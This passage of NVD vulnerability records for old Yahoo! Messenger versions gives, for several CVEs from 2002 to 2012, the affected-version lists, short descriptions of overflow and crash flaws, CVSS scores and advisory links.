              "matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.195:*:*:*:*:*:*:*",
              "matchCriteriaId": "544F71AF-1E2B-4F87-839C-EC981EC5D69D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.244:*:*:*:*:*:*:*",
              "matchCriteriaId": "09125309-423D-4A4E-B7FB-37E4F531159B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
              "matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.401:*:*:*:*:*:*:*",
              "matchCriteriaId": "67DE14CA-5781-4F78-8562-DDD53C7CB7E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.402:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6CB6D1A-E1A2-4E1C-9E02-24A192D72750",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.413:*:*:*:*:*:*:*",
              "matchCriteriaId": "40D0435F-F38D-42E2-AA34-F256B9D2B2C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.416:*:*:*:*:*:*:*",
              "matchCriteriaId": "25099018-E7E2-47A3-A57C-E2B106E75987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.419:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AF049DF-9D3E-471A-958D-C760E8A894EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*",
              "matchCriteriaId": "661E07A2-FB77-4411-95B3-BD0ED72DC6B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.797:beta:*:*:*:*:*:*",
              "matchCriteriaId": "0159CADA-CF93-4F4A-AC9D-D76D91B76AAF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.907:beta:*:*:*:*:*:*",
              "matchCriteriaId": "982ECC94-686C-4965-8FBA-9D1F6F70213C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.922:beta:*:*:*:*:*:*",
              "matchCriteriaId": "CBD43C5B-040D-4704-B049-3AC3DCE9C9CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.1389:beta:*:*:*:*:*:*",
              "matchCriteriaId": "6A0285E3-0D62-4870-96B8-20C7F3C00D90",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.1912:*:*:*:*:*:*:*",
              "matchCriteriaId": "664D05A8-0EB0-48AE-9208-E66EA03B084E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2018:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F1C4DB-6A5F-4D35-AC17-218074419BDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2034:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A6ABACF-86B7-42B7-A15D-57EE6A765238",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2112:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE1C8908-D4C7-406D-AF03-E7406C480B34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2123:*:*:*:*:*:*:*",
              "matchCriteriaId": "24C8559C-9D77-4BB3-981C-D151CB014DB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2128:*:*:*:*:*:*:*",
              "matchCriteriaId": "7ABCAA3D-F88B-4081-A843-0BD6D78941C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2133:*:*:*:*:*:*:*",
              "matchCriteriaId": "6CE5D420-216B-41C0-9E56-798F992D0A7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2136:*:*:*:*:*:*:*",
              "matchCriteriaId": "A30A5955-F276-4C86-8286-02AD0BC3DF7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2152:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7B990ED-2BAC-4093-A6CD-34F04C95E64F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2160:*:*:*:*:*:*:*",
              "matchCriteriaId": "C60DAAA0-032B-4D9C-83FF-26FFC278F270",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2161:*:*:*:*:*:*:*",
              "matchCriteriaId": "BF1DBCAF-12A7-490C-BADF-8534B78E06CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2162:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A1FEC40-A9EA-44AF-9DF3-1F85E1DDE4FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.331:pre-alpha:*:*:*:*:*:*",
              "matchCriteriaId": "5E582D93-A84A-4C12-AE2B-4B2B71681BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.525:beta:*:*:*:*:*:*",
              "matchCriteriaId": "FE43B4C9-8C06-4CCF-8BC4-75C75EEAD425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.542:beta:*:*:*:*:*:*",
              "matchCriteriaId": "41680B8B-2D8A-4583-9629-55833461AEAB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1102:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E921962-F4C1-4785-8E63-657F7C39E16F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1241:*:*:*:*:*:*:*",
              "matchCriteriaId": "6CFF7B20-BB90-4A8A-8E6D-C91BF9238B31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1258:*:*:*:*:*:*:*",
              "matchCriteriaId": "AA5BBB19-F1B8-4432-B48D-E9BC52D55729",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1264:*:*:*:*:*:*:*",
              "matchCriteriaId": "93519572-6872-425A-81C3-52198B94CB88",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1267:*:*:*:*:*:*:*",
              "matchCriteriaId": "179796DF-BEB9-4611-8703-D959F1218C31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:10.0.0.1270:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEAE7084-6DC6-423B-AA69-9F8C65305D49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.1751:*:*:*:*:*:*:*",
              "matchCriteriaId": "27221A33-B95F-4FBE-B049-04CBA88B8CC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.2009:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD59825D-5C68-4B5C-A46E-6DAB2F953502",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:11.0.0.2014:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B8234BC-4AC1-4A00-955B-D1F1467E11C0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
    },
    {
      "lang": "es",
      "value": "Un desbordamiento de entero en el m\u00e9todo CYImage::LoadJPG en YImage.dll en Yahoo! Messenger antes de v11.5.0.155, cuando la compartici\u00f3n de fotos est\u00e1 activada, podr\u00eda permitir a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una imagen JPG modificada a mano que genera un desbordamiento de b\u00fafer basado en memoria din\u00e1mica (mont\u00edculo)."
    }
  ],
  "id": "CVE-2012-0268",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.1,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2012-01-19T15:55:00.990",
  "references": [
    {
      "source": "PSIRT-CNA@flexerasoftware.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/47041"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/47041"
    }
  ],
  "sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-189"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2006-06-29 01:05
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll.
Impacted products
Vendor Product Version
yahoo messenger 7.0.438
yahoo messenger 7.5.0.814



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
              "matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
              "matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
    },
    {
      "lang": "es",
      "value": "Yahoo! Messenger v7.5.0.814 y v7.0.438 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de mensajes que contienen caracteres no ASCII, lo que provoca la ca\u00edda en jscript.dll."
    }
  ],
  "id": "CVE-2006-3298",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-06-29T01:05:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20773"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.security.nnov.ru/Gnews281.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/18622"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20773"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.security.nnov.ru/Gnews281.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/18622"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2003-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of "%" (percent) characters after the Yahoo ID.
Impacted products
Vendor Product Version
yahoo messenger 5.6



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
    }
  ],
  "id": "CVE-2003-1135",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 2.6,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2003-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/archive/1/342472"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/8894"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/archive/1/342472"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/8894"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-05-19 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users.
Impacted products
Vendor Product Version
yahoo messenger 5.5
yahoo messenger 5.6
yahoo messenger 5.6.0.1351
yahoo messenger 6.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
    }
  ],
  "id": "CVE-2005-1671",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 2.1,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-05-19T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-05-02 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode.
Impacted products
Vendor Product Version
yahoo messenger 4.0
yahoo messenger 5.0
yahoo messenger 5.0.1046
yahoo messenger 5.0.1065
yahoo messenger 5.0.1232
yahoo messenger 5.5
yahoo messenger 5.5.1249
yahoo messenger 5.6
yahoo messenger 5.6.0.1347
yahoo messenger 5.6.0.1351
yahoo messenger 5.6.0.1355
yahoo messenger 5.6.0.1356
yahoo messenger 5.6.0.1358
yahoo messenger 6.0
yahoo messenger 6.0.0.1643
yahoo messenger 6.0.0.1750
yahoo messenger 6.0.0.1921



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
              "matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
              "matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
              "matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
              "matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
              "matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
    }
  ],
  "id": "CVE-2005-0737",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-05-02T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/12750"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/12750"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
    }
  ],
  "id": "CVE-2002-1665",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/755755"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/755755"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-02-03 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature.
Impacted products
Vendor Product Version
